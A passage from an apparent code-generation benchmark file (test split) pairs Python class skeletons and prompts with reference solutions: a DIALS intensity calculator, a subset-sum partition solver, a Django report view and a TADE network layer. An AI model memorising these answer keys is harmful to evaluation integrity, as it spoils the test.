tau = []\n zeta2 = []\n for s, b, p, z in zip(sbox, bbox, phi, zeta):\n for z0, f in enumerate(range(b[4], b[5])):\n phi0 = scan.get_angle_from_array_index(int(f), deg=False)\n phi1 = scan.get_angle_from_array_index(int(f) + 1, deg=False)\n m = s.mask[z0:z0 + 1, :, :]\n if m.count(mask_code) > 0:\n tau.append((phi1 + phi0) / 2.0 - p)\n zeta2.append(z)\n return (flex.double(tau), flex.double(zeta2))\n<|end_body_1|>\n\n<|body_start_2|>\n TINY = 1e-10\n assert sigma_m > TINY\n a = scitbx.math.erf(self.e1 / sigma_m)\n b = scitbx.math.erf(self.e2 / sigma_m)\n R = (a - b) / 2.0\n assert R.all_ge(0)\n mask = R < TINY\n assert mask.count(True) < len(mask)\n R.set_selected(mask, TINY)\n return flex.log(R)\n<|end_body_2|>\n", "class_docstring": "Calculate the fraction of observed intensity for different sigma_m.", "class_name": "FractionOfObservedIntensity", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FractionOfObservedIntensity:\n \"\"\"Calculate the fraction of observed intensity for different sigma_m.\"\"\"\n\n def __init__(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object\"\"\"\n <|body_0|>\n\n def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\"\"\"\n <|body_1|>\n\n def __call__(self, sigma_m):\n \"\"\"Calculate the fraction of observed intensity for each observation. Params: sigma_m The mosaicity Returns: A list of log intensity fractions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n dphi2 = scan.get_oscillation(deg=False)[1] / 2.0\n tau, zeta = self._calculate_tau_and_zeta(crystal, beam, detector, goniometer, scan, reflections)\n self.e1 = (tau + dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n self.e2 = (tau - dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n<|end_body_0|>\n\n<|body_start_1|>\n from dials.algorithms.shoebox import MaskCode\n mask_code = MaskCode.Valid | MaskCode.Foreground\n sbox = reflections['shoebox']\n bbox = reflections['bbox']\n phi = reflections['xyzcal.mm'].parts()[2]\n zeta = reflections['zeta']\n tau = []\n zeta2 = []\n for s, b, p, z in zip(sbox, bbox, phi, zeta):\n for z0, f in enumerate(range(b[4], b[5])):\n phi0 = scan.get_angle_from_array_index(int(f), deg=False)\n phi1 = scan.get_angle_from_array_index(int(f) + 1, deg=False)\n m = s.mask[z0:z0 + 1, :, :]\n if m.count(mask_code) > 0:\n tau.append((phi1 + phi0) / 2.0 - p)\n zeta2.append(z)\n return (flex.double(tau), flex.double(zeta2))\n<|end_body_1|>\n\n<|body_start_2|>\n TINY = 1e-10\n assert sigma_m > TINY\n a = scitbx.math.erf(self.e1 / sigma_m)\n b = scitbx.math.erf(self.e2 / sigma_m)\n R = (a - b) / 2.0\n assert R.all_ge(0)\n mask = R < TINY\n assert mask.count(True) < len(mask)\n R.set_selected(mask, TINY)\n return flex.log(R)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000216", "length_bytes": 27074, "license_type": "permissive", "methods": [{"docstring": "Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object", "name": "__init__", "signature": "def __init__(self, crystal, beam, detector, goniometer, scan, reflections)"}, {"docstring": "Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)", "name": "_calculate_tau_and_zeta", "signature": "def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections)"}, {"docstring": "Calculate the fraction of observed intensity for each observation. Params: sigma_m The mosaicity Returns: A list of log intensity fractions", "name": "__call__", "signature": "def __call__(self, sigma_m)"}], "n_methods": 3, "prompt": "Implement the Python class `FractionOfObservedIntensity` described below.\n\nClass description:\nCalculate the fraction of observed intensity for different sigma_m.\n\nMethod signatures and docstrings:\n- def __init__(self, crystal, beam, detector, goniometer, scan, reflections): Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object\n- def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections): Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\n- def __call__(self, sigma_m): Calculate the fraction of observed intensity for each observation. Params: sigma_m The mosaicity Returns: A list of log intensity fractions", "prompted_full_text": "Implement the Python class `FractionOfObservedIntensity` described below.\n\nClass description:\nCalculate the fraction of observed intensity for different sigma_m.\n\nMethod signatures and docstrings:\n- def __init__(self, crystal, beam, detector, goniometer, scan, reflections): Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object\n- def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections): Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\n- def __call__(self, sigma_m): Calculate the fraction of observed intensity for each observation. Params: sigma_m The mosaicity Returns: A list of log intensity fractions\n\n<|skeleton|>\nclass FractionOfObservedIntensity:\n \"\"\"Calculate the fraction of observed intensity for different sigma_m.\"\"\"\n\n def __init__(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object\"\"\"\n <|body_0|>\n\n def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\"\"\"\n <|body_1|>\n\n def __call__(self, sigma_m):\n \"\"\"Calculate the fraction of observed intensity for each observation. Params: sigma_m The mosaicity Returns: A list of log intensity fractions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n dphi2 = scan.get_oscillation(deg=False)[1] / 2.0\n tau, zeta = self._calculate_tau_and_zeta(crystal, beam, detector, goniometer, scan, reflections)\n self.e1 = (tau + dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n self.e2 = (tau - dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n<|end_body_0|>\n\n<|body_start_1|>\n from dials.algorithms.shoebox import MaskCode\n mask_code = MaskCode.Valid | MaskCode.Foreground\n sbox = reflections['shoebox']\n bbox = reflections['bbox']\n phi = reflections['xyzcal.mm'].parts()[2]\n zeta = reflections['zeta']\n tau = []\n zeta2 = []\n for s, b, p, z in zip(sbox, bbox, phi, zeta):\n for z0, f in enumerate(range(b[4], b[5])):\n phi0 = scan.get_angle_from_array_index(int(f), deg=False)\n phi1 = scan.get_angle_from_array_index(int(f) + 1, deg=False)\n m = s.mask[z0:z0 + 1, :, :]\n if m.count(mask_code) > 0:\n tau.append((phi1 + phi0) / 2.0 - p)\n zeta2.append(z)\n return (flex.double(tau), flex.double(zeta2))\n<|end_body_1|>\n\n<|body_start_2|>\n TINY = 1e-10\n assert sigma_m > TINY\n a = scitbx.math.erf(self.e1 / sigma_m)\n b = scitbx.math.erf(self.e2 / sigma_m)\n R = (a - b) / 2.0\n assert R.all_ge(0)\n mask = R < TINY\n assert mask.count(True) < len(mask)\n R.set_selected(mask, TINY)\n return flex.log(R)\n<|end_body_2|>\n", "revision_id": "88bf7f7c5ac44defc046ebf0719cde748092cfff", "skeleton": "<|skeleton|>\nclass FractionOfObservedIntensity:\n \"\"\"Calculate the fraction of observed intensity for different sigma_m.\"\"\"\n\n def __init__(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object\"\"\"\n <|body_0|>\n\n def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\"\"\"\n <|body_1|>\n\n def __call__(self, sigma_m):\n \"\"\"Calculate the fraction of observed intensity for each observation. Params: sigma_m The mosaicity Returns: A list of log intensity fractions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FractionOfObservedIntensity:\n \"\"\"Calculate the fraction of observed intensity for different sigma_m.\"\"\"\n\n def __init__(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object\"\"\"\n dphi2 = scan.get_oscillation(deg=False)[1] / 2.0\n tau, zeta = self._calculate_tau_and_zeta(crystal, beam, detector, goniometer, scan, reflections)\n self.e1 = (tau + dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n self.e2 = (tau - dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n\n def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\"\"\"\n from dials.algorithms.shoebox import MaskCode\n mask_code = MaskCode.Valid | MaskCode.Foreground\n sbox = reflections['shoebox']\n bbox = reflections['bbox']\n phi = reflections['xyzcal.mm'].parts()[2]\n zeta = reflections['zeta']\n tau = []\n zeta2 = []\n for s, b, p, z in zip(sbox, bbox, phi, zeta):\n for z0, f in enumerate(range(b[4], b[5])):\n phi0 = scan.get_angle_from_array_index(int(f), deg=False)\n phi1 = scan.get_angle_from_array_index(int(f) + 1, deg=False)\n m = s.mask[z0:z0 + 1, :, :]\n if m.count(mask_code) > 0:\n tau.append((phi1 + phi0) / 2.0 - p)\n zeta2.append(z)\n return (flex.double(tau), flex.double(zeta2))\n\n def __call__(self, sigma_m):\n \"\"\"Calculate the fraction of observed intensity for each observation. Params: sigma_m The mosaicity Returns: A list of log intensity fractions\"\"\"\n TINY = 1e-10\n assert sigma_m > TINY\n a = scitbx.math.erf(self.e1 / sigma_m)\n b = scitbx.math.erf(self.e2 / sigma_m)\n R = (a - b) / 2.0\n assert R.all_ge(0)\n mask = R < TINY\n assert mask.count(True) < len(mask)\n R.set_selected(mask, TINY)\n return flex.log(R)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/dials/algorithms/profile_model/gaussian_rs/calculator.py", "source_repo": "dials/dials", "split": "test", "star_events_count": 71} {"blob_id": "74c3e2c43f3f20d49f0ae7c0a3b52991d3bc92d2", "bodies": ["cache = {}\n\ndef helper(nums, i, k):\n if (i, k) in cache:\n return False\n if i >= len(nums):\n return False\n if k == 0:\n return True\n include_curr = helper(nums, i + 1, k - nums[i])\n exclude_curr = helper(nums, i + 1, k)\n if include_curr:\n cache[i, k] = False\n return include_curr or exclude_curr\nif not nums:\n return True\ns = sum(nums)\nif s % 2 != 0:\n return False\nreturn helper(nums, 0, s / 2)", "s = sum(nums)\nif s % 2 != 0:\n return False\ndp = [[None for _ in xrange(len(nums) + 1)] for _ in xrange(s / 2 + 1)]\nfor i in xrange(len(nums) + 1):\n dp[0][i] = True\nfor i in range(1, s / 2 + 1):\n dp[i][0] = False\nfor i in xrange(1, s / 2 + 1):\n for j in xrange(1, len(nums) + 1):\n target = i - nums[j - 1]\n if target < 0:\n dp[i][j] = dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1] or dp[target][j - 1]\nreturn dp[-1][-1]"], "bodies_text": "<|body_start_0|>\n cache = {}\n\n def helper(nums, i, k):\n if (i, k) in cache:\n return False\n if i >= len(nums):\n return False\n if k == 0:\n return True\n include_curr = helper(nums, i + 1, k - nums[i])\n exclude_curr = helper(nums, i + 1, k)\n if include_curr:\n cache[i, k] = False\n return include_curr or exclude_curr\n if not nums:\n return True\n s = sum(nums)\n if s % 2 != 0:\n return False\n return helper(nums, 0, s / 2)\n<|end_body_0|>\n\n<|body_start_1|>\n s = sum(nums)\n if s % 2 != 0:\n return False\n dp = [[None for _ in xrange(len(nums) + 1)] for _ in xrange(s / 2 + 1)]\n for i in xrange(len(nums) + 1):\n dp[0][i] = True\n for i in range(1, s / 2 + 1):\n dp[i][0] = False\n for i in xrange(1, s / 2 + 1):\n for j in xrange(1, len(nums) + 1):\n target = i - nums[j - 1]\n if target < 0:\n dp[i][j] = dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1] or dp[target][j - 1]\n return dp[-1][-1]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def canPartition(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_0|>\n\n def canPartitionIter(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cache = {}\n\n def helper(nums, i, k):\n if (i, k) in cache:\n return False\n if i >= len(nums):\n return False\n if k == 0:\n return True\n include_curr = helper(nums, i + 1, k - nums[i])\n exclude_curr = helper(nums, i + 1, k)\n if include_curr:\n cache[i, k] = False\n return include_curr or exclude_curr\n if not nums:\n return True\n s = sum(nums)\n if s % 2 != 0:\n return False\n return helper(nums, 0, s / 2)\n<|end_body_0|>\n\n<|body_start_1|>\n s = sum(nums)\n if s % 2 != 0:\n return False\n dp = [[None for _ in xrange(len(nums) + 1)] for _ in xrange(s / 2 + 1)]\n for i in xrange(len(nums) + 1):\n dp[0][i] = True\n for i in range(1, s / 2 + 1):\n dp[i][0] = False\n for i in xrange(1, s / 2 + 1):\n for j in xrange(1, len(nums) + 1):\n target = i - nums[j - 1]\n if target < 0:\n dp[i][j] = dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1] or dp[target][j - 1]\n return dp[-1][-1]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000217", "length_bytes": 2382, "license_type": "no_license", "methods": [{"docstring": "This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.", "name": "canPartition", "signature": "def canPartition(self, nums)"}, {"docstring": "This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.", "name": "canPartitionIter", "signature": "def canPartitionIter(self, nums)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000726", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canPartition(self, nums): This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\n- def canPartitionIter(self, nums): This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canPartition(self, nums): This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\n- def canPartitionIter(self, nums): This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\n\n<|skeleton|>\nclass Solution:\n\n def canPartition(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_0|>\n\n def canPartitionIter(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cache = {}\n\n def helper(nums, i, k):\n if (i, k) in cache:\n return False\n if i >= len(nums):\n return False\n if k == 0:\n return True\n include_curr = helper(nums, i + 1, k - nums[i])\n exclude_curr = helper(nums, i + 1, k)\n if include_curr:\n cache[i, k] = False\n return include_curr or exclude_curr\n if not nums:\n return True\n s = sum(nums)\n if s % 2 != 0:\n return False\n return helper(nums, 0, s / 2)\n<|end_body_0|>\n\n<|body_start_1|>\n s = sum(nums)\n if s % 2 != 0:\n return False\n dp = [[None for _ in xrange(len(nums) + 1)] for _ in xrange(s / 2 + 1)]\n for i in xrange(len(nums) + 1):\n dp[0][i] = True\n for i in range(1, s / 2 + 1):\n dp[i][0] = False\n for i in xrange(1, s / 2 + 1):\n for j in xrange(1, len(nums) + 1):\n target = i - nums[j - 1]\n if target < 0:\n dp[i][j] = dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1] or dp[target][j - 1]\n return dp[-1][-1]\n<|end_body_1|>\n", "revision_id": "b7c22210c2a892b51a3397e51095614ea6fe5d8a", "skeleton": "<|skeleton|>\nclass Solution:\n\n def canPartition(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_0|>\n\n def canPartitionIter(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def canPartition(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n cache = {}\n\n def helper(nums, i, k):\n if (i, k) in cache:\n return False\n if i >= len(nums):\n return False\n if k == 0:\n return True\n include_curr = helper(nums, i + 1, k - nums[i])\n exclude_curr = helper(nums, i + 1, k)\n if include_curr:\n cache[i, k] = False\n return include_curr or exclude_curr\n if not nums:\n return True\n s = sum(nums)\n if s % 2 != 0:\n return False\n return helper(nums, 0, s / 2)\n\n def canPartitionIter(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n s = sum(nums)\n if s % 2 != 0:\n return False\n dp = [[None for _ in xrange(len(nums) + 1)] for _ in xrange(s / 2 + 1)]\n for i in xrange(len(nums) + 1):\n dp[0][i] = True\n for i in range(1, s / 2 + 1):\n dp[i][0] = False\n for i in xrange(1, s / 2 + 1):\n for j in xrange(1, len(nums) + 1):\n target = i - nums[j - 1]\n if target < 0:\n dp[i][j] = dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1] or dp[target][j - 1]\n return dp[-1][-1]\n", "source": "the_stack_v2_python_sparse", "source_path": "recursion/partition_equal_subset_sum.py", "source_repo": "manthan787/algo-practice", "split": "test", "star_events_count": 1} {"blob_id": "0cb010fec95294db88560c917b9bb2ec7568225b", "bodies": ["form.instance.noodle = Noodle.objects.get(pk=self.kwargs['id'])\nform.instance.type = 'ND'\nreturn super().form_valid(form)", "context = super().get_context_data(**kwargs)\ncontext['name'] = Noodle.objects.get(pk=self.kwargs['id']).name\nreturn context"], "bodies_text": "<|body_start_0|>\n form.instance.noodle = Noodle.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'ND'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Noodle.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "class_docstring": "Class based view for reporting noodles", "class_name": "NoodleReportForm", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NoodleReportForm:\n \"\"\"Class based view for reporting noodles\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n <|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form.instance.noodle = Noodle.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'ND'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Noodle.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000218", "length_bytes": 10733, "license_type": "permissive", "methods": [{"docstring": "Ensures hidden form values are filled", "name": "form_valid", "signature": "def form_valid(self, form)"}, {"docstring": "Passes item name to template", "name": "get_context_data", "signature": "def get_context_data(self, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002185", "prompt": "Implement the Python class `NoodleReportForm` described below.\n\nClass description:\nClass based view for reporting noodles\n\nMethod signatures and docstrings:\n- def form_valid(self, form): Ensures hidden form values are filled\n- def get_context_data(self, **kwargs): Passes item name to template", "prompted_full_text": "Implement the Python class `NoodleReportForm` described below.\n\nClass description:\nClass based view for reporting noodles\n\nMethod signatures and docstrings:\n- def form_valid(self, form): Ensures hidden form values are filled\n- def get_context_data(self, **kwargs): Passes item name to template\n\n<|skeleton|>\nclass NoodleReportForm:\n \"\"\"Class based view for reporting noodles\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n <|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form.instance.noodle = Noodle.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'ND'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Noodle.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "revision_id": "6bf8e75a1f279ac584daa4ee19927ffccaa67551", "skeleton": "<|skeleton|>\nclass NoodleReportForm:\n \"\"\"Class based view for reporting noodles\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n <|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NoodleReportForm:\n \"\"\"Class based view for reporting noodles\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n form.instance.noodle = Noodle.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'ND'\n return super().form_valid(form)\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n context = super().get_context_data(**kwargs)\n context['name'] = Noodle.objects.get(pk=self.kwargs['id']).name\n return context\n", "source": "the_stack_v2_python_sparse", "source_path": "rameniaapp/views/report.py", "source_repo": "awlane/ramenia", "split": "test", "star_events_count": 0} {"blob_id": "ec53f19c80eb1e296e12949fc45f5cd3af31f792", "bodies": ["super().__init__()\nself.norm = torch.nn.InstanceNorm1d(in_channels)\nself.aux_conv = torch.nn.Sequential(torch.nn.Conv1d(aux_channels, in_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\nself.gated_conv = torch.nn.Sequential(torch.nn.Conv1d(in_channels, in_channels * 2, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\nself.upsample = torch.nn.Upsample(scale_factor=upsample_factor, mode=upsample_mode)", "x = self.norm(x)\nc = self.upsample(c)\nc = self.aux_conv(c)\ncg = self.gated_conv(c)\ncg1, cg2 = cg.split(cg.size(1) // 2, dim=1)\ny = cg1 * self.upsample(x) + cg2\nreturn (y, c)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.norm = torch.nn.InstanceNorm1d(in_channels)\n self.aux_conv = torch.nn.Sequential(torch.nn.Conv1d(aux_channels, in_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.gated_conv = torch.nn.Sequential(torch.nn.Conv1d(in_channels, in_channels * 2, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.upsample = torch.nn.Upsample(scale_factor=upsample_factor, mode=upsample_mode)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.norm(x)\n c = self.upsample(c)\n c = self.aux_conv(c)\n cg = self.gated_conv(c)\n cg1, cg2 = cg.split(cg.size(1) // 2, dim=1)\n y = cg1 * self.upsample(x) + cg2\n return (y, c)\n<|end_body_1|>\n", "class_docstring": "TADE Layer module.", "class_name": "TADELayer", "detected_licenses": ["MIT", "LicenseRef-scancode-proprietary-license", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TADELayer:\n \"\"\"TADE Layer module.\"\"\"\n\n def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'):\n \"\"\"Initilize TADE layer.\"\"\"\n <|body_0|>\n\n def forward(self, x, c):\n \"\"\"Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.norm = torch.nn.InstanceNorm1d(in_channels)\n self.aux_conv = torch.nn.Sequential(torch.nn.Conv1d(aux_channels, in_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.gated_conv = torch.nn.Sequential(torch.nn.Conv1d(in_channels, in_channels * 2, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.upsample = torch.nn.Upsample(scale_factor=upsample_factor, mode=upsample_mode)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.norm(x)\n c = self.upsample(c)\n c = self.aux_conv(c)\n cg = self.gated_conv(c)\n cg1, cg2 = cg.split(cg.size(1) // 2, dim=1)\n y = cg1 * self.upsample(x) + cg2\n return (y, c)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000219", "length_bytes": 4805, "license_type": "permissive", "methods": [{"docstring": "Initilize TADE layer.", "name": "__init__", "signature": "def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest')"}, {"docstring": "Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).", "name": "forward", "signature": "def forward(self, x, c)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005447", "prompt": "Implement the Python class `TADELayer` described below.\n\nClass description:\nTADE Layer module.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'): Initilize TADE layer.\n- def forward(self, x, c): Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).", "prompted_full_text": "Implement the Python class `TADELayer` described below.\n\nClass description:\nTADE Layer module.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'): Initilize TADE layer.\n- def forward(self, x, c): Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).\n\n<|skeleton|>\nclass TADELayer:\n \"\"\"TADE Layer module.\"\"\"\n\n def 